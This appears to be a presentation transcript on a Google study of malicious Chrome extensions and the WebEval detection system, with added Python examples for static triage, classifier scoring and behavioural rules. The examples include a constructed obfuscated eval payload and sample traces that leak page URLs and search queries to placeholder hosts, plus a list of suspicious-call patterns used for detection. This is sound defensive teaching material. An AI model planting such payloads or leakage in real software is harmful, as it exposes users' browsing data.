Trends and Lessons from Three Years Fighting Malicious Extensions. Nav Jagpal, Eric Dingle, Jean-Philippe Gravel, Panayiotis Mavrommatis, Niels Provos.


Trends and Lessons from Three Years Fighting Malicious Extensions. Nav Jagpal, Eric Dingle, Jean-Philippe Gravel, Panayiotis Mavrommatis, Niels Provos, Moheeb Abu Rajab, Kurt Thomas (Google). Presenter: Haonan

Motivation. Browser extensions: add-ons that let users customize their browsing experience by altering the browser's core functionality. Examples: search toolbars, password managers, ad blockers.

Malicious Extensions. Man-in-the-browser attacks: Facebook account hijackers, ad injectors, and password stealers.

Malicious Extensions. Binary-based examples: the Torpig banking trojan, the ZeroAccess bot.

Related Work. Security sandboxes and malware detection: Chrome extensions run in the context of a web page, so system-wide malware monitoring techniques have a hard time isolating the extension's activity from that of the browser itself.

WebEval. WebEval is designed to return a verdict on whether an extension is malicious. If the extension is pending publication, the Chrome Web Store blocks it from release. Previously published extensions are taken down and uninstalled from all affected Chrome instances.

Design Goals. 1. Minimize malware installs. 2. Simplify human verification. 3. Time-constrained evaluation. 4. Comprehensible, historical reports. 5. Tolerant to feature drift.

System Flow

Evaluating Extensions: Static Analysis. Permissions and content scripts; code obfuscation; files and directory structure; developer analysis.
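As an added example (not WebEval's code, which is not public), here is the kind of static triage the slide lists, written in Python: it parses a constructed manifest.json, flags high-risk permissions and content scripts whose match patterns cover every site, and applies a crude obfuscation heuristic to two constructed JavaScript files. The permission list, the thresholds and the sample files are assumptions chosen for illustration.

```python
"""Static triage of an extension package: manifest permissions, content-script
reach, and a crude obfuscation heuristic over its JavaScript.  Added example;
thresholds and samples are assumptions, not WebEval's."""
import json
import math
import re
from collections import Counter

# Constructed sample manifest (not a real extension).
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Sample Toolbar",
    "version": "1.0",
    "permissions": ["tabs", "webRequest", "webRequestBlocking", "<all_urls>", "cookies"],
    "content_scripts": [{
        "matches": ["https://*.facebook.com/*", "http://*/*"],
        "js": ["cs.js"],
        "run_at": "document_start",
    }],
    "background": {"scripts": ["bg.js"]},
})

# Permissions that let an extension read or rewrite arbitrary pages/traffic (assumed list).
HIGH_RISK_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking", "cookies",
                         "tabs", "history", "proxy", "management", "webNavigation"}
# Match patterns that put a content script on every site.
BROAD_MATCH = re.compile(r"^(<all_urls>|\*://\*/\*|https?://\*/\*)$")
# Calls that turn data into code at run time; common in packed/obfuscated payloads.
SUSPICIOUS_CALLS = ("eval(", "new Function(", "unescape(", "String.fromCharCode(",
                    "atob(", "document.write(")


def analyze_manifest(manifest_json: str) -> dict:
    m = json.loads(manifest_json)
    perms = set(m.get("permissions", []))
    scripts = m.get("content_scripts", [])
    matches = [p for cs in scripts for p in cs.get("matches", [])]
    return {
        "high_risk_permissions": sorted(perms & HIGH_RISK_PERMISSIONS),
        "content_script_matches": matches,
        "broad_content_scripts": [p for p in matches if BROAD_MATCH.match(p)],
        "runs_at_document_start": any(cs.get("run_at") == "document_start" for cs in scripts),
    }


def shannon_entropy(text: str) -> float:
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0


def obfuscation_indicators(js: str) -> dict:
    lines = js.splitlines() or [""]
    calls = [c for c in SUSPICIOUS_CALLS if c in js]
    longest = max(len(line) for line in lines)
    return {
        "entropy_bits_per_char": round(shannon_entropy(js), 2),
        "longest_line": longest,
        "suspicious_calls": calls,
        # Long lines alone are just minification; require a dynamic-code call as well.
        "likely_obfuscated": bool(calls) and (longest > 300 or len(calls) >= 2),
    }


def static_findings(manifest_json: str, js_files: dict) -> list:
    """Analyst-readable findings, one string each (design goal: comprehensible reports)."""
    findings = []
    r = analyze_manifest(manifest_json)
    if r["high_risk_permissions"]:
        findings.append("high-risk permissions: " + ", ".join(r["high_risk_permissions"]))
    for p in r["broad_content_scripts"]:
        findings.append(f"content script injected on all sites via {p}")
    for name, js in js_files.items():
        o = obfuscation_indicators(js)
        if o["likely_obfuscated"]:
            findings.append(f"{name}: likely obfuscated ({', '.join(o['suspicious_calls'])})")
    return findings


# Constructed scripts: a packed payload and a plain one.
PAYLOAD = "location.href='http://tracker.example.invalid/?u='+encodeURIComponent(location.href);"
OBFUSCATED_JS = ("var _0xab12=[];eval(String.fromCharCode("
                 + ",".join(str(ord(c)) for c in PAYLOAD * 3) + "));")
BENIGN_JS = ("function setBadge(n) {\n"
             "  chrome.browserAction.setBadgeText({text: String(n)});\n"
             "}\nsetBadge(3);\n")

if __name__ == "__main__":
    for line in static_findings(SAMPLE_MANIFEST, {"cs.js": OBFUSCATED_JS, "bg.js": BENIGN_JS}):
        print(line)
```

The point of returning named findings rather than a bare score is the slide's second design goal: a human verifier should be able to read the report and recognize each item as a concrete activity.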

Evaluating Extensions: Dynamic Analysis. Outputs: 1. network requests, 2. DOM operations, 3. Chrome API calls. Sandbox environment. Behavioral suites: generic suites and malicious-logic suites.

Annotation. Scan all of the extension's files. Scan its outgoing network requests. Evaluate the extension in the context of all previously scanned extensions. Cluster extensions by the referrer of their incoming install requests.

Scoring Extensions: Automated Detection. They train a model daily over all previously scanned extensions, with labels provided by human experts. Every input to the classifier must translate directly to an activity that analysts can recognize. The model is logistic regression trained by online gradient descent with L1 regularization, which keeps the feature space small.
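An added illustration (not the paper's implementation) of the scoring model described on this slide: logistic regression trained by online gradient descent, with an L1 proximal (soft-threshold) step so that uninformative features fall out of the model, over named boolean features so that every weight maps back to an activity an analyst recognizes. The feature names, the six labeled examples and the learning-rate and regularization constants are constructed for the example; the lazy per-feature L1 step is a simplification of the usual truncated-gradient approach.

```python
"""Online logistic regression with L1 regularisation over named, analyst-
readable boolean features.  Added example; the data and constants are assumptions."""
import math


class OnlineL1LogReg:
    """SGD on log-loss; each step is a gradient update followed by a soft-threshold
    (proximal L1) step applied lazily to the features present in the example."""

    def __init__(self, lr=0.1, l1=0.01):
        self.lr, self.l1 = lr, l1
        self.w = {}          # feature name -> weight (absent means 0.0, i.e. pruned)
        self.b = 0.0

    def predict_proba(self, feats):
        z = self.b + sum(self.w.get(f, 0.0) for f in feats)
        return 1.0 / (1.0 + math.exp(-z))

    def update(self, feats, label):
        g = self.predict_proba(feats) - label      # dLoss/dz for logistic loss
        self.b -= self.lr * g
        shrink = self.lr * self.l1
        for f in feats:
            w = self.w.get(f, 0.0) - self.lr * g
            w = math.copysign(max(abs(w) - shrink, 0.0), w)   # soft threshold
            if w == 0.0:
                self.w.pop(f, None)                 # feature dropped from the model
            else:
                self.w[f] = w

    def fit(self, data, epochs=40):
        for _ in range(epochs):
            for feats, label in data:
                self.update(feats, label)
        return self

    def explain(self, feats, top=3):
        """Largest weighted features of one extension, for the analyst's report."""
        contrib = sorted(((self.w.get(f, 0.0), f) for f in feats), reverse=True)
        return [(f, round(w, 3)) for w, f in contrib[:top]]


# Constructed, analyst-labeled training set: feature = one recognisable activity.
LABELED = [
    ({"perm:<all_urls>", "perm:tabs", "net:search_query_to_third_party", "dom:inject_script_tag"}, 1),
    ({"perm:<all_urls>", "perm:tabs", "net:search_query_to_third_party", "api:cookies.get"}, 1),
    ({"perm:<all_urls>", "net:search_query_to_third_party", "dom:click_facebook_like"}, 1),
    ({"perm:storage", "perm:tabs", "api:storage.set"}, 0),
    ({"perm:storage", "api:storage.get", "dom:read_document_title"}, 0),
    ({"perm:<all_urls>", "perm:tabs", "dom:read_document_title"}, 0),   # e.g. an ad blocker
]


def train_daily_model():
    """Stands in for the daily retrain over all previously scanned, labeled extensions."""
    return OnlineL1LogReg().fit(LABELED)


def score(model, feats, threshold=0.5):
    p = model.predict_proba(feats)
    return {
        "p_malicious": round(p, 3),
        "verdict": "malicious" if p >= threshold else "benign",
        "top_features": model.explain(feats),
    }


if __name__ == "__main__":
    m = train_daily_model()
    print(score(m, {"perm:<all_urls>", "perm:tabs", "net:search_query_to_third_party"}))
    print(score(m, {"perm:storage", "api:storage.get"}))
    print("features kept:", sorted(m.w))
```

Because each feature is an activity name, the report for a flagged extension can say "search query sent to a third party" instead of "feature 3172 fired", which is what lets a human verify the verdict quickly; a retrain over new labels handles feature drift without changing the code.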

Scoring Extensions: Manual Rules. Facebook hijacking; search leakage; user tracking.
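An added example covering both the three dynamic-analysis outputs listed two slides earlier (network requests, DOM operations, Chrome API calls) and the three manual rules on this slide: hand-written detection logic run over a constructed trace of sandbox events. The event format, the canary search query, the list of URLs the sandbox visited, the host names and the thresholds are assumptions; WebEval's real rules are not published in this form.

```python
"""Hand-written behavioural rules over sandbox output: network requests, DOM
operations and Chrome API calls.  Added example with a constructed trace."""
from urllib.parse import quote, quote_plus, urlparse

# What the sandbox did, so the rules can recognise leaked data (assumed values).
CANARY_QUERY = "webeval canary 4f2a"                    # typed into the Google search box
VISITED = ["https://news.example/article-1", "https://shop.example/cart",
           "https://mail.example/inbox"]                 # pages the sandbox browsed


def host(url):
    h = urlparse(url).hostname or ""
    return h[4:] if h.startswith("www.") else h


def is_third_party(url, page_url):
    return host(url) != host(page_url)


def rule_search_leakage(events):
    """Search query reaches a host other than the search engine's."""
    needles = {CANARY_QUERY, quote(CANARY_QUERY), quote_plus(CANARY_QUERY)}
    hits = []
    for e in events:
        if e["type"] != "net":
            continue
        blob = e["url"] + " " + e.get("body", "")
        if any(n in blob for n in needles) and is_third_party(e["url"], e["page"]):
            hits.append(e["url"])
    return hits


def rule_facebook_hijacking(events):
    """Nobody is at the keyboard in the sandbox, so clicks/submits on facebook.com
    and POSTs to it are the extension acting in the user's session."""
    hits = []
    for e in events:
        on_fb = host(e["page"]).endswith("facebook.com")
        if e["type"] == "dom" and on_fb and e["op"] in ("click", "submit"):
            hits.append(f"{e['op']} {e['target']}")
        elif e["type"] == "net" and e.get("method") == "POST" and host(e["url"]).endswith("facebook.com"):
            hits.append(f"POST {e['url']}")
    return hits


def rule_user_tracking(events, threshold=2):
    """One third-party host receives the URLs of at least `threshold` visited pages."""
    per_host = {}
    for e in events:
        if e["type"] != "net":
            continue
        blob = e["url"] + " " + e.get("body", "")
        leaked = {v for v in VISITED if v in blob or quote(v, safe="") in blob}
        if leaked and is_third_party(e["url"], e["page"]):
            per_host.setdefault(host(e["url"]), set()).update(leaked)
    return {h: sorted(v) for h, v in per_host.items() if len(v) >= threshold}


RULES = {"search_leakage": rule_search_leakage,
         "facebook_hijacking": rule_facebook_hijacking,
         "user_tracking": rule_user_tracking}


def evaluate(events):
    """Name -> evidence for every rule that fired; empty dict means no manual rule hit."""
    out = {}
    for name, rule in RULES.items():
        hits = rule(events)
        if hits:
            out[name] = hits
    return out


# Constructed sandbox traces.  "api" events are Chrome API calls, "dom" events are
# content-script DOM operations, "net" events are outgoing requests with the page they came from.
SEARCH_PAGE = "https://www.google.com/search?q=webeval+canary+4f2a"
MALICIOUS_TRACE = [
    {"type": "api", "page": SEARCH_PAGE, "call": "chrome.tabs.query"},
    {"type": "net", "page": SEARCH_PAGE, "method": "GET",
     "url": "https://stats.example.invalid/q?s=webeval+canary+4f2a"},
    {"type": "dom", "page": "https://www.facebook.com/somepage", "op": "click",
     "target": "button[data-testid=like]"},
    {"type": "net", "page": "https://news.example/article-1", "method": "POST",
     "url": "https://stats.example.invalid/t", "body": "u=https%3A%2F%2Fnews.example%2Farticle-1"},
    {"type": "net", "page": "https://shop.example/cart", "method": "POST",
     "url": "https://stats.example.invalid/t", "body": "u=https%3A%2F%2Fshop.example%2Fcart"},
    {"type": "net", "page": "https://mail.example/inbox", "method": "GET",
     "url": "https://mail.example/api/unread"},
]
BENIGN_TRACE = [
    {"type": "api", "page": SEARCH_PAGE, "call": "chrome.storage.local.set"},
    {"type": "net", "page": "https://news.example/article-1", "method": "GET",
     "url": "https://news.example/article-1/comments.json"},
    {"type": "dom", "page": "https://www.facebook.com/somepage", "op": "setAttribute", "target": "img.ad"},
]

if __name__ == "__main__":
    print(evaluate(MALICIOUS_TRACE))
    print(evaluate(BENIGN_TRACE))
```

Rules like these only fire on behaviour the behavioural suites actually exercised (the sandbox has to perform a search and open Facebook for the first two to have anything to match), which is the limitation the presentation returns to at the end.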

Evaluation: monthly and weekly figures (table not reproduced in the transcript).

Evaluation Top 10 permissions requested in extension manifest.

Evaluation Top 10 Chrome API calls performed during dynamic execution.

Evaluation Top 10 DOM operations performed during dynamic execution.

Evaluation Precision and recall of individual behavioral signatures.

Evaluation: CDF of the delay between a malicious extension's first submission to the Chrome Web Store and its detection.

Evaluation Actions taken against malicious extensions in the Chrome Web Store over time.

Trends in Malicious Extensions: malware varieties detected each month from 2012 to 2015.

Trends in Malicious Extensions CDF of installs broken down

Trends in Malicious Extensions Malware installations via the Chrome Web Store for the past three years broken down.

Trends in Malicious Extensions Registration time of malware authors.

Trends in Malicious Extensions Top 10 regions impacted by malicious extensions downloaded via the Chrome Web Store.

Trends in Malicious Extensions Top 10 login geolocations of malicious developers.

Lessons Learned. The abusive extension ecosystem is drastically different from that of malicious binaries. An abuse-prevention team must be equipped with the tools needed to respond rapidly to new, unforeseen threats.

Limitations. Dynamic analysis and security crawlers always run the risk of overlooking malicious behavior because of cloaking. The behavioral suites are not guaranteed to trigger all of an extension's logic during evaluation.

Conclusion. They present a comprehensive view of how malicious extensions in the Chrome Web Store have evolved and monetized victims over the last three years. They detail the design and implementation of their security framework, which combines dynamic analysis, static analysis, and reputation tracking to detect 96.5% of all known malicious extensions. They highlight the importance of human experts in operating any large-scale, live deployment of a security scanner, in order to address evasive malware strains. They explore the virulent impact of malicious extensions that garnered over 50 million installs, the single largest threat infecting 10.7 million Chrome users.

Opinion. Human intervention; policies.

Quiz. 1. Why aren't traditional malware monitoring techniques effective against malicious extensions? 2. What is the principle for choosing features for the classifier? 3. Why are human experts needed in their approach?

Thank you!